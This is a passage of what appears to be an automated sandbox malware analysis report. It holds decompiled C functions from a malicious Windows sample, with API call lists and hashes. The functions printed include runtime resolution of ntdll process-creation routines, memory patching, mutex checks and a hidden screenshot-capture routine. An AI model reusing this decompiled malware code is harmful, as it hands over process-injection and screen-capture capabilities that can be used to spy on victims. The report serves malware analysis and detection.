    													 *0x423060 =  *0x423060 | 0xffffffff;
    													 *0x42305c = _t73;
    													__eflags = _t73 - _t83;
    													if(_t73 == _t83) {
    														goto L27;
    													} else {
    														goto L34;
    													}
    												}
    											}
    										}
    									}
    								} else {
    									_t110 =  *0x422bbc - _t83; // 0x77e5a120
    									if(_t110 == 0) {
    										goto L27;
    									} else {
    										goto L24;
    									}
    								}
    							}
    						}
    					}
    				}
    				L47:
    				return _t40;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 0040E9BC
    • GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 0040EA92
    • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0040EAB1
    • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0040EAC3
    • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0040EAD5
    • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040EAE7
    • GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040EAF9
    • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040EB0B
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0040EB44
    • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040EB53
    • InitializeCriticalSection.KERNEL32(004231AC,?,?,00000000), ref: 0040EB80
    • WSAStartup.WS2_32(00000202,?), ref: 0040EB96
    • CreateEventW.KERNEL32(00422BD0,00000001,00000000,00000000,?,?,00000000), ref: 0040EBB7
    • GetLengthSid.ADVAPI32(00000000,000000FF,00422BA8,?,?,00000000), ref: 0040EBEC
    • GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 0040EC19
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
    • String ID: @xw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
    • API String ID: 3091071419-944592941
    • Opcode ID: fa8a8f21df3ef0477e084f520fdd5187f1b350d3fb1b71ab9a0f1fb12392cebd
    • Instruction ID: 6ebb372c4d2dc279074349e0270c5f727c352a9d832e6b3227ae34f1e97ef748
    • Opcode Fuzzy Hash: fa8a8f21df3ef0477e084f520fdd5187f1b350d3fb1b71ab9a0f1fb12392cebd
    • Instruction Fuzzy Hash: 78919E71A04301EFCB30EF62EE85A163BB4BB14305B90097FE941B32A0D778A956CB5D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			_entry_(signed int __ecx, void* __edx, void* __eflags, void* __fp0) {
    				char _v5;
    				int _v12;
    				char _v16;
    				char _v20;
    				void* _t22;
    				void* _t28;
    				char _t29;
    				char _t33;
    				signed int _t36;
    				void* _t51;
    
    				_t51 = __fp0;
    				_t34 = __ecx;
    				_t33 = 0; // executed
    				_t22 = E0040E97B(__ecx, __edx, 0); // executed
    				if(_t22 == 0) {
    					L24:
    					__eflags = _t33;
    					_t21 = _t33 == 0;
    					__eflags = _t21;
    					ExitProcess(0 | _t21);
    				}
    				_v20 = 0;
    				_v16 = 1;
    				_v5 = 0;
    				SetErrorMode(0x8007);
    				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
    				if(_t28 == 0) {
    					L19:
    					_t29 = E0040F5BB(_t34, __eflags, _t51, _v20, _v16);
    					L20:
    					_t33 = _t29;
    					L21:
    					if(_t33 == 0 || ( *0x422b98 & 0x00000002) == 0) {
    						goto L24;
    					} else {
    						Sleep(0xffffffff);
    						return _t29;
    					}
    				}
    				_t36 = 0;
    				if(_v12 <= 0) {
    					L14:
    					LocalFree(_t28);
    					_t48 = _t33;
    					if(_t33 == 0) {
    						__eflags = _v5;
    						if(__eflags == 0) {
    							goto L19;
    						}
    						E004080CB(_t36);
    						_t29 = E0041D2BC();
    						__eflags =  *0x422b98 & 0x00000004;
    						_t33 = _t29;
    						if(( *0x422b98 & 0x00000004) != 0) {
    							_t29 = E00407F44(0x4228e0, 0);
    						}
    						goto L21;
    					}
    					_t29 = E0040F3C2(_t48);
    					goto L20;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					_t34 =  *(_t28 + _t36 * 4);
    					if(_t34 != 0 &&  *_t34 == 0x2d) {
    						_t34 =  *(_t34 + 2) & 0x0000ffff;
    						if(_t34 == 0x66) {
    							_v20 = 1;
    						} else {
    							if(_t34 == 0x69) {
    								_t33 = 1;
    							} else {
    								if(_t34 == 0x6e) {
    									_v16 = 0;
    								} else {
    									if(_t34 == 0x76) {
    										_v5 = 1;
    									}
    								}
    							}
    						}
    					}
    					_t36 = _t36 + 1;
    				} while (_t36 < _v12);
    				goto L14;
    			}

    APIs
      • Part of subcall function 0040E97B: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 0040E9BC
      • Part of subcall function 0040E97B: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 0040EA92
      • Part of subcall function 0040E97B: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0040EAB1
      • Part of subcall function 0040E97B: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0040EAC3
      • Part of subcall function 0040E97B: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0040EAD5
      • Part of subcall function 0040E97B: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040EAE7
      • Part of subcall function 0040E97B: GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040EAF9
      • Part of subcall function 0040E97B: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040EB0B
    • SetErrorMode.KERNEL32(00008007,00000000), ref: 0040F929
    • GetCommandLineW.KERNEL32(?), ref: 0040F933
    • CommandLineToArgvW.SHELL32(00000000), ref: 0040F93A
    • LocalFree.KERNEL32(00000000), ref: 0040F98F
    • Sleep.KERNEL32(000000FF,?,00000001), ref: 0040F9E5
    • ExitProcess.KERNEL32 ref: 0040F9F6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
    • String ID: (B
    • API String ID: 1184560534-566106762
    • Opcode ID: 4498de991e688f18d371340eadb7455b07049ab894b6283f2ec3557d0de6ed0c
    • Instruction ID: 06ec7da1c708e89769c56df364006b45230c9372001e74c49d0c52b8d8a915d9
    • Opcode Fuzzy Hash: 4498de991e688f18d371340eadb7455b07049ab894b6283f2ec3557d0de6ed0c
    • Instruction Fuzzy Hash: 36210AB0944245B5CF346BB489097AE7B505F02308F9840BFE44177AE2C67E484E8B5E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E0041A94B() {
    				void* _t30;
    				void* _t33;
    				intOrPtr* _t35;
    				void* _t36;
    				void* _t39;
    				void* _t41;
    
    				_t39 = _t41 - 0x74;
    				_t17 = _t39 - 0x260;
    				 *((char*)(_t39 + 0x73)) = 0;
    				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
    				if(_t17 != 0) {
    					L8:
    					E0041645B(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
    				} else {
    					PathAddBackslashW(_t39 - 0x260);
    					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
    					while(1) {
    						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
    						if(_t17 != 0) {
    							break;
    						}
    						PathRemoveBackslashW(_t39 - 0x260);
    						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
    							goto L8;
    						} else {
    							PathAddBackslashW(_t39 - 0x260);
    							continue;
    						}
    						goto L9;
    					}
    					if( *((short*)(_t39 - 0x44)) != 0x7b) {
    						goto L8;
    					} else {
    						 *((short*)(_t39 + 8)) = 0;
    						_t17 = _t39 - 0x44;
    						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
    						if(_t17 != 0) {
    							goto L8;
    						} else {
    							 *((char*)(_t39 + 0x73)) = 1;
    						}
    					}
    				}
    				L9:
    				return  *((intOrPtr*)(_t39 + 0x73));
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,00000000), ref: 0041A96A
    • PathAddBackslashW.SHLWAPI(?), ref: 0041A981
    • PathRemoveBackslashW.SHLWAPI(?), ref: 0041A992
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 0041A99F
    • PathAddBackslashW.SHLWAPI(?), ref: 0041A9B0
    • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 0041A9BF
    • CLSIDFromString.OLE32(?,?), ref: 0041A9D9
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
    • String ID:
    • API String ID: 613918483-0
    • Opcode ID: 18936fbe24d20d9608907f8ee321ecefaf400316c4cf2982d45756bdf1441dd5
    • Instruction ID: 1ed91e3b3591ed1363ec3d304cd3f7ed46133817e8c88f08c28723f1286077f9
    • Opcode Fuzzy Hash: 18936fbe24d20d9608907f8ee321ecefaf400316c4cf2982d45756bdf1441dd5
    • Instruction Fuzzy Hash: 7D1172B150410CAADB209BB1DC88EEF7BACAB04344F140466F615E3121E639DE999B65
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 38%
    			E00411779(WCHAR* _a4, char _a8, signed short _a12) {
    				struct HINSTANCE__* _v12;
    				struct HINSTANCE__* _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				void* _v28;
    				void* _v32;
    				struct HDC__* _v36;
    				_Unknown_base(*)()* _v40;
    				_Unknown_base(*)()* _v44;
    				struct tagPOINT _v52;
    				_Unknown_base(*)()* _v56;
    				struct HINSTANCE__* _v60;
    				_Unknown_base(*)()* _v64;
    				_Unknown_base(*)()* _v68;
    				_Unknown_base(*)()* _v72;
    				_Unknown_base(*)()* _v76;
    				_Unknown_base(*)()* _v80;
    				_Unknown_base(*)()* _v84;
    				_Unknown_base(*)()* _v88;
    				struct HINSTANCE__* _v92;
    				struct HINSTANCE__* _v96;
    				struct HINSTANCE__* _v100;
    				char _v104;
    				_Unknown_base(*)()* _v108;
    				intOrPtr _v112;
    				char _v116;
    				_Unknown_base(*)()* _v120;
    				char _v148;
    				signed int _v152;
    				struct _ICONINFO _v172;
    				char _v188;
    				struct HINSTANCE__* _t169;
    				_Unknown_base(*)()* _t176;
    				struct HINSTANCE__* _t181;
    				_Unknown_base(*)()* _t182;
    				struct HINSTANCE__* _t183;
    				_Unknown_base(*)()* _t191;
    				struct HDC__* _t197;
    				struct HICON__* _t199;
    				signed int _t200;
    				intOrPtr _t202;
    				intOrPtr _t204;
    				void* _t206;
    				void* _t223;
    				intOrPtr* _t224;
    				void* _t239;
    				void* _t248;
    				unsigned int _t260;
    				intOrPtr* _t262;
    				signed short _t263;
    				intOrPtr _t264;
    				WCHAR** _t265;
    				intOrPtr _t268;
    				signed int _t269;
    				signed int _t272;
    				void* _t275;
    
    				_v32 = 0;
    				_v60 = 0;
    				_v16 = 0;
    				_v104 = 1;
    				_v100 = 0;
    				_v96 = 0;
    				_v92 = 0;
    				_t169 = LoadLibraryA("gdiplus.dll");
    				_v20 = _t169;
    				_v24 = GetProcAddress(_t169, "GdiplusStartup");
    				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
    				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
    				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
    				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
    				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
    				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
    				_v108 = _t176;
    				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
    					L66:
    					if(_v20 != 0) {
    						FreeLibrary(_v20);
    					}
    					if(_v60 != 0) {
    						FreeLibrary(_v60);
    					}
    					if(_v16 != 0) {
    						FreeLibrary(_v16);
    					}
    					return _v32;
    				} else {
    					_t181 = LoadLibraryA("ole32.dll");
    					_v60 = _t181;
    					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
    					_v120 = _t182;
    					if(_t182 == 0) {
    						goto L66;
    					}
    					_t183 = LoadLibraryA("gdi32.dll");
    					_v16 = _t183;
    					_t262 = GetProcAddress(_t183, "CreateDCW");
    					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
    					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
    					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
    					_v56 = GetProcAddress(_v16, "SelectObject");
    					_v76 = GetProcAddress(_v16, "BitBlt");
    					_v84 = GetProcAddress(_v16, "DeleteObject");
    					_t191 = GetProcAddress(_v16, "DeleteDC");
    					_v68 = _t191;
    					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
    						goto L66;
    					} else {
    						_push(0);
    						_push( &_v104);
    						_push( &_v116);
    						_v104 = 1;
    						_v100 = 0;
    						_v96 = 0;
    						_v92 = 0;
    						if(_v24() != 0) {
    							goto L66;
    						}
    						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
    						_v24 = _t268;
    						if(_t268 == 0) {
    							L65:
    							_v80(_v116);
    							goto L66;
    						}
    						_t197 = _v12(_t268);
    						_v36 = _t197;
    						if(_t197 == 0) {
    							L64:
    							_v68(_v24);
    							goto L65;
    						}
    						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
    						_v12 = _t199;
    						if(_t199 == 0) {
    							L24:
    							_t263 = 0;
    							goto L26;
    						} else {
    							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
    								_v12 = 0;
    							}
    							if(_v12 != 0) {
    								_t263 = _a12;
    								L26:
    								if(_t263 == 0) {
    									_t200 = _v28(_t268, 8);
    									_t269 = _t200;
    									_a12 = _v28(_v24, 0xa);
    								} else {
    									_t269 = _t263 & 0x0000ffff;
    									_a12 = _t269;
    								}
    								_t202 = _v44(_v24, _t269, _a12);
    								_v44 = _t202;
    								if(_t202 == 0) {
    									L63:
    									_v68(_v36);
    									goto L64;
    								} else {
    									_t204 = _v56(_v36, _t202);
    									_v112 = _t204;
    									if(_t204 == 0) {
    										L62:
    										_v84(_v44);
    										goto L63;
    									}
    									_t206 = 0;
    									_t248 = 0;
    									if(_t263 != 0) {
    										_t260 = (_t263 & 0x0000ffff) >> 1;
    										_t206 =  <  ? 0 : _v52.x - _t260;
    										_t248 =  <  ? 0 : _v52.y - _t260;
    										_t81 =  &_v52;
    										 *_t81 = _v52.x - _t206;
    										if( *_t81 < 0) {
    											_v52.x = 0;
    										}
    										_t84 =  &(_v52.y);
    										 *_t84 = _v52.y - _t248;
    										if( *_t84 < 0) {
    											_v52.y = 0;
    										}
    									}
    									_push(0x40cc0020);
    									_push(_t248);
    									_push(_t206);
    									_push(_v24);
    									_push(_a12);
    									_push(_t269);
    									_push(0);
    									_push(0);
    									_push(_v36);
    									if(_v76() == 0) {
    										L61:
    										_v56(_v36, _v112);
    										goto L62;
    									} else {
    										if(_v12 != 0) {
    											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
    											_t239 = _v52.y - _v172.yHotspot;
    											_t240 =  <  ? 0 : _t239;
    											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
    										}
    										_push( &_v12);
    										_push(0);
    										_push(_v44);
    										_v12 = 0;
    										if(_v88() != 0 || _v12 == 0) {
    											goto L61;
    										} else {
    											_push( &_v28);
    											_push( &_a12);
    											_a12 = 0;
    											_v28 = 0;
    											if(_v40() != 0) {
    												L60:
    												_v72(_v12);
    												goto L61;
    											}
    											_t215 = _v28;
    											if(_v28 == 0 || _a12 == 0) {
    												goto L60;
    											} else {
    												_t264 = E00416378(_t215);
    												_v40 = _t264;
    												if(_t264 == 0) {
    													goto L60;
    												}
    												_push(_t264);
    												_push(_v28);
    												_push(_a12);
    												if(_v64() != 0) {
    													L52:
    													E004163A8(_v40);
    													if(_a12 == 0) {
    														_push( &_v32);
    														_push(1);
    														_push(0);
    														if(_v120() == 0 && _v32 != 0) {
    															_v152 = 0;
    															if(_a8 > 0) {
    																E004163E4( &_v148, 0x4044a4, 0x10);
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
    																_v152 = _v152 + 1;
    															}
    															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
    															_t224 = _v32;
    															if(_t223 == 0) {
    																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
    															} else {
    																 *((intOrPtr*)( *_t224 + 8))(_t224);
    																_v32 = 0;
    															}
    														}
    													}
    													goto L60;
    												}
    												_t272 = 0;
    												if(_a12 <= 0) {
    													goto L52;
    												}
    												_t265 = _t264 + 0x30;
    												while(lstrcmpiW(_a4,  *_t265) != 0) {
    													_t272 = _t272 + 1;
    													_t265 =  &(_t265[0x13]);
    													if(_t272 < _a12) {
    														continue;
    													}
    													goto L52;
    												}
    												E004163E4( &_v188, _t272 * 0x4c + _v40, 0x10);
    												_a12 = 0;
    												goto L52;
    											}
    										}
    									}
    								}
    							}
    							goto L24;
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 004117AB
    • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 004117BC
    • GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 004117C9
    • GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 004117D6
    • GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 004117E3
    • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 004117F0
    • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 004117FD
    • GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0041180A
    • LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 00411852
    • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041185D
    • LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0041186F
    • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041187A
    • GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 00411886
    • GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 00411893
    • GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 004118A0
    • GetProcAddress.KERNEL32(?,SelectObject), ref: 004118AD
    • GetProcAddress.KERNEL32(?,BitBlt), ref: 004118BA
    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 004118C7
    • GetProcAddress.KERNEL32(?,DeleteDC), ref: 004118D4
    • LoadImageW.USER32 ref: 00411978
    • GetIconInfo.USER32(00000000,?), ref: 0041198D
    • GetCursorPos.USER32(?,?,?,?), ref: 0041199B
    • DrawIcon.USER32 ref: 00411A6C
    • lstrcmpiW.KERNEL32(?,-00000030,?,?,?), ref: 00411AED
    • FreeLibrary.KERNEL32(000001F4,?,?,?), ref: 00411C04
    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00411C0E
    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00411C18
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
    • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
    • API String ID: 1554524784-1167942225
    • Opcode ID: fea4aa82a547a5a4290b9fea2ec24b9fb75146eb20ddf00801b57ce3d5729be1
    • Instruction ID: 0e094e399ddef241c5d2713891e089f1b57298588d542dc69b965a403b3f8512
    • Opcode Fuzzy Hash: fea4aa82a547a5a4290b9fea2ec24b9fb75146eb20ddf00801b57ce3d5729be1
    • Instruction Fuzzy Hash: 31E1D6B1D00259ABCF209FE5CC84AEEBBB9FF04341F14446BE615B2260E7799A91CF54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0040F5BB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, char _a8) {
    				char _v536;
    				char _v540;
    				char _v544;
    				char _v644;
    				signed char _v648;
    				char _v748;
    				short _v760;
    				char _v764;
    				short _v772;
    				int _v776;
    				int _v780;
    				void _v781;
    				void* _v784;
    				char _v785;
    				void _v788;
    				void _v789;
    				void* _v792;
    				char _v793;
    				char _v797;
    				void* _v800;
    				void* _v804;
    				void* _v808;
    				char _v809;
    				int _v813;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				int _t74;
    				int _t79;
    				intOrPtr* _t80;
    				int _t82;
    				void* _t84;
    				int _t88;
    				void* _t92;
    				int _t100;
    				int _t108;
    				void* _t113;
    				int _t130;
    				void* _t145;
    				void* _t147;
    				void* _t167;
    
    				_t167 = __fp0;
    				_t136 = __ecx;
    				_t149 =  &_v764;
    				_v781 = 0;
    				if(E0041B5BF(0, __ecx,  &_v764,  *0x422bf4) != 0) {
    					_v780 = _v760;
    					_t130 = E0040F229( &_v780, __ecx, _v764);
    					_v776 = _t130;
    					if(_t130 == 0) {
    						_v780 = 0;
    					}
    					E0041B667( &_v764);
    				}
    				if(_v780 != 0x1e6) {
    					__eflags = _v780 - 0xc;
    					if(__eflags != 0) {
    						L41:
    						E004163A8(_v772);
    						return _v785;
    					}
    					_t74 = E0040EDBB(_t136, __eflags, 0x8889347b, 2);
    					_v776 = _t74;
    					__eflags = _t74;
    					if(_t74 == 0) {
    						L39:
    						__eflags = _a8 - 1;
    						if(_a8 == 1) {
    							E00417E0D(0, _t149,  *0x422bf4);
    						}
    						goto L41;
    					}
    					E0040ED80(0x19367401,  &_v748, 1);
    					_t79 = E00419B8B( &_v760);
    					_t149 = GetFileAttributesExW;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L23:
    						_t80 =  *0x422b9c; // 0x0
    						__imp__IsWellKnownSid( *_t80, 0x16);
    						__eflags = _t80 - 1;
    						if(__eflags != 0) {
    							_v789 = 0;
    							_t82 = ReadProcessMemory(0xffffffff, _t149,  &_v789, 1, 0);
    							__eflags = _t82;
    							if(_t82 == 0) {
    								L29:
    								_push( *((intOrPtr*)(_v780 + 4)));
    								_t84 = E0041C7BF(_t136, E00408FD1,  *((intOrPtr*)(_v780 + 8)));
    								_t149 = 0x422bf8;
    								_v797 = E00408FD1(_t84, 0, 0x422bf8,  &_v540, E00408FD1, 0x422bf8, _t167);
    								L30:
    								__eflags = _v793 - 1;
    								if(_v793 == 1) {
    									_t88 = E00417C6F( &_v536, 0, _t149, 0,  &_v776);
    									__eflags = _t88;
    									_v813 = _t88 != 0;
    									__eflags = _v813;
    									if(_v813 != 0) {
    										E0040ED80(0x1a43533f,  &_v760, 1);
    										_t92 = CreateEventW(0x422bd0, 1, 0,  &_v772);
    										_t145 = _v788;
    										_v804 = _t92;
    										_v800 = _t145;
    										_push(0xffffffff);
    										__eflags = _t92;
    										if(_t92 != 0) {
    											WaitForMultipleObjects(2,  &_v792, 0, ??);
    										} else {
    											WaitForSingleObject(_t145, ??);
    										}
    										_t149 = CloseHandle;
    										__eflags = _v792;
    										if(_v792 != 0) {
    											CloseHandle(_v792);
    										}
    										CloseHandle(_v772);
    										CloseHandle(_t145);
    									}
    								}
    								L38:
    								E00419B7B(_v780);
    								goto L39;
    							}
    							__eflags = _v789 - 0xe9;
    							if(_v789 != 0xe9) {
    								goto L29;
    							}
    							_t100 = GetFileAttributesExW(0x423006, 0x78f16360,  &_v788);
    							__eflags = _t100 - 1;
    							if(_t100 != 1) {
    								goto L29;
    							}
    							_push( *((intOrPtr*)(_v784 + 4)));
    							E0041C7BF(_t136, E0040933D,  *_v784);
    							_push(_a4);
    							_t149 = 0x422bf8;
    							_push( &_v544);
    							_v809 = E0040933D( &_v544, _v800, 0x422bf8, 0x422bf8, _t167);
    							VirtualFree(_v808, 0, 0x8000);
    							goto L30;
    						}
    						_v789 = E0040969D(__eflags);
    						goto L38;
    					} else {
    						goto L20;
    					}
    					while(1) {
    						L20:
    						_v781 = 0;
    						_t108 = ReadProcessMemory(0xffffffff, _t149,  &_v781, 1, 0);
    						__eflags = _t108;
    						if(_t108 == 0) {
    							goto L22;
    						}
    						__eflags = _v781 - 0xe9;
    						if(_v781 == 0xe9) {
    							goto L23;
    						}
    						L22:
    						Sleep(0x1f4);
    					}
    				}
    				if(E00409286(_t136, _v772) != 0) {
    					E0040ED80(0x32901130,  &_v748, 1);
    					_t113 = CreateMutexW(0x422bd0, 1,  &_v760);
    					_v792 = _t113;
    					if(_t113 != 0) {
    						if(GetLastError() == 0xb7) {
    							CloseHandle(_v780);
    							_v780 = 0;
    						}
    						if(_v780 != 0) {
    							E00413E8F(_t136,  &_v644);
    							if((_v648 & 0x00000020) != 0) {
    								 *0x422b98 =  *0x422b98 | 0x00000010;
    							}
    							E00415AB4();
    							if(( *0x422b98 & 0x00000010) != 0) {
    								ExitWindowsEx(0x14, 0x80000000);
    							}
    							E0040ED80(0x1a43533f,  &_v748, 1);
    							_t147 = OpenEventW(2, 0,  &_v760);
    							if(_t147 != 0) {
    								SetEvent(_t147);
    								CloseHandle(_t147);
    							}
    							E0040F2E6(1);
    							_v785 = 1;
    							CloseHandle(_v784);
    						}
    					}
    				}
    				goto L41;
    			}

    APIs
      • Part of subcall function 0041B5BF: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B5E4
      • Part of subcall function 0041B5BF: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B5F7
    • CreateMutexW.KERNEL32(00422BD0,00000001,?,32901130,?,00000001,?), ref: 0040F64B
    • GetLastError.KERNEL32 ref: 0040F65D
    • CloseHandle.KERNEL32(000001E6), ref: 0040F674
    • ExitWindowsEx.USER32(00000014,80000000), ref: 0040F6B7
    • OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 0040F6D6
    • SetEvent.KERNEL32(00000000), ref: 0040F6E3
    • CloseHandle.KERNEL32(00000000), ref: 0040F6EA
    • CloseHandle.KERNEL32(000001E6,00000001), ref: 0040F6FC
    • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 0040F760
    • Sleep.KERNEL32(000001F4), ref: 0040F772
    • IsWellKnownSid.ADVAPI32(00000000,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 0040F783
    • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000000,00000001,00000000), ref: 0040F7AB
    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 0040F80A
    • GetFileAttributesExW.KERNEL32(00423006,78F16360,0000000C), ref: 0040F7C7
      • Part of subcall function 0041C7BF: VirtualProtect.KERNEL32(00408FD1,?,00000040,00000000,74B5F9B0,?,?,0040F826,?,?), ref: 0041C7D4
      • Part of subcall function 0041C7BF: VirtualProtect.KERNEL32(00408FD1,?,00000000,00000000,?,?,0040F826,?,?), ref: 0041C807
    • CreateEventW.KERNEL32(00422BD0,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,00422BF8,00000000,?,?,?), ref: 0040F888
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040F8A1
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0040F8B1
    • CloseHandle.KERNEL32(0000000C), ref: 0040F8C7
    • CloseHandle.KERNEL32(?), ref: 0040F8CD
